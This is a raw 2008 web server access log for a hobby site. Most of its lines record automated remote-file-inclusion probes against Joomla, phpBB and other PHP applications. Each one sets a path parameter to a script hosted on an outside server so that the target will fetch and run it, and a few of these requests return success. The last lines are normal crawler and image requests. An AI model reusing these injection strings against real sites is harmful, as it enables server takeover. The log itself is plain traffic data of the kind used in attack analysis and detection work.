38.117.65.239 - - [24/Aug/2008:09:45:05 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.63.2.169 - - [24/Aug/2008:09:45:06 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.63.2.169 - - [24/Aug/2008:09:45:06 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:45:08 -0700] "GET /logs/access_080329.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:45:09 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:45:09 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:45:15 -0700] "GET /logs/access_080218.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
38.117.65.239 - - [24/Aug/2008:09:45:40 -0700] "GET /logs/access_080628.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.177.199 - - [24/Aug/2008:09:45:40 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:45:40 -0700] "GET /logs/access_080125.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.64.177.199 - - [24/Aug/2008:09:45:41 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:45:41 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:45:41 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:45:45 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.geocities.com/cemen_dewi/dewi/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:45:48 -0700] "GET /logs/access_080723.log/vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:45:48 -0700] "GET /vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:45:48 -0700] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.210.195 - - [24/Aug/2008:09:45:49 -0700] "GET /logs/access_080309.log//index.php?custompluginfile[]=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.59.241 - - [24/Aug/2008:09:45:51 -0700] "GET /logs/access_080403.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.210.195 - - [24/Aug/2008:09:45:51 -0700] "GET /logs//index.php?custompluginfile[]=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.210.195 - - [24/Aug/2008:09:45:52 -0700] "GET //index.php?custompluginfile[]=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 200 9895 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.59.241 - - [24/Aug/2008:09:45:52 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://leqhi.com/id.txt?? HTTP/1.1" 200 9932 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.59.241 - - [24/Aug/2008:09:45:52 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:45:55 -0700] "GET /logs/access_080419.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:45:56 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 200 9935 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:45:56 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:46:04 -0700] "GET /logs/access_080303.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:46:04 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:46:05 -0700] "GET /logs/access_080329.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:46:06 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:46:06 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:46:07 -0700] "GET /logs/access_080525.log/vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:46:14 -0700] "GET /logs/access_080302.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:46:19 -0700] "GET /logs/access_080218.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:46:20 -0700] "GET /logs/access_080303.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:46:20 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:46:29 -0700] "GET /logs/access_080405.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:09:46:29 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:09:46:29 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:46:30 -0700] "GET /logs/access_080302.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:46:31 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/cemen_dewi/dewi/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:46:31 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/cemen_dewi/dewi/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:46:31 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/cemen_dewi/dewi/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:46:32 -0700] "GET /logs/access_080624.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/cemen_dewi/dewi/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:09:46:33 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:09:46:33 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:46:38 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:46:38 -0700] "GET /logs/access_080401.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:46:42 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
193.91.99.14 - - [24/Aug/2008:09:46:43 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [24/Aug/2008:09:46:43 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:47:14 -0700] "GET /logs/access_080728.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/cemen_dewi/dewi/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:47:14 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/cemen_dewi/dewi/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:47:14 -0700] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/cemen_dewi/dewi/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.56.111.194 - - [24/Aug/2008:09:47:17 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.56.111.194 - - [24/Aug/2008:09:47:17 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.56.111.194 - - [24/Aug/2008:09:47:17 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.70.114 - - [24/Aug/2008:09:47:30 -0700] "GET /errors.php?error=http://www.muhtaroglu.com.tr/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
74.53.70.114 - - [24/Aug/2008:09:47:30 -0700] "GET /logs/errors.php?error=http://www.muhtaroglu.com.tr/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:47:31 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/cemen_dewi/dewi/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.63.2.169 - - [24/Aug/2008:09:47:41 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.63.2.169 - - [24/Aug/2008:09:47:41 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:47:42 -0700] "GET /logs/access_080401.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:47:43 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:47:43 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:47:49 -0700] "GET /logs/access_080329.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:47:50 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:47:50 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.226.176 - - [24/Aug/2008:09:47:57 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [24/Aug/2008:09:47:57 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.150.189.10 - - [24/Aug/2008:09:47:58 -0700] "GET /logs/access_080811.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [24/Aug/2008:09:47:58 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [24/Aug/2008:09:47:59 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 200 10003 "-" "libwww-perl/5.76" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:48:04 -0700] "GET /logs/access_080218.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.150.189.10 - - [24/Aug/2008:09:48:06 -0700] "GET /logs/access_080723.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:48:53 -0700] "GET /logs/errors.php?error=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:48:53 -0700] "GET /errors.php?error=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:48:57 -0700] "GET /logs/errors.php?error=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:48:57 -0700] "GET /errors.php?error=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:48:57 -0700] "GET /logs/access_080731.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
87.248.163.41 - - [24/Aug/2008:09:49:03 -0700] "GET /logs/access_080811.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.248.163.41 - - [24/Aug/2008:09:49:03 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:49:03 -0700] "GET /logs/access_080223.log//?path%5Bdocroot%5D=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:49:04 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 200 62004 "-" "libwww-perl/5.65" "www.dmulk.com"
87.248.163.41 - - [24/Aug/2008:09:49:04 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 200 10003 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:49:08 -0700] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:49:08 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:49:09 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.248.163.41 - - [24/Aug/2008:09:49:11 -0700] "GET /logs/access_080723.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.64.167.56 - - [24/Aug/2008:09:49:11 -0700] "GET /logs/access_080811.log///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
151.64.167.56 - - [24/Aug/2008:09:49:16 -0700] "GET /logs///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:09:49:22 -0700] "GET /logs/access_071226.log/classified_right.php?language_dir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:49:24 -0700] "GET /logs/access_080731.log//?path%5Bdocroot%5D=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:49:26 -0700] "GET /vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:49:51 -0700] "GET /vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.25 - - [24/Aug/2008:09:49:52 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.25 - - [24/Aug/2008:09:49:52 -0700] "GET /bikes/dteel/2008_01_26/ZbThumbnail.info HTTP/1.1" 200 112300 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
213.203.202.68 - - [24/Aug/2008:09:49:57 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.202.68 - - [24/Aug/2008:09:49:57 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.95.2.112 - - [24/Aug/2008:09:50:11 -0700] "GET /bikes/dteel/2008_08_17/IMG_4445tag.JPG HTTP/1.1" 200 311123 "http://www.st-owners.com/forums/showthread.php?t=42795&page=8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
71.95.2.112 - - [24/Aug/2008:09:50:11 -0700] "GET /bikes/dteel/2008_08_17/IMG_5163s.JPG HTTP/1.1" 200 325776 "http://www.st-owners.com/forums/showthread.php?t=42795&page=8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
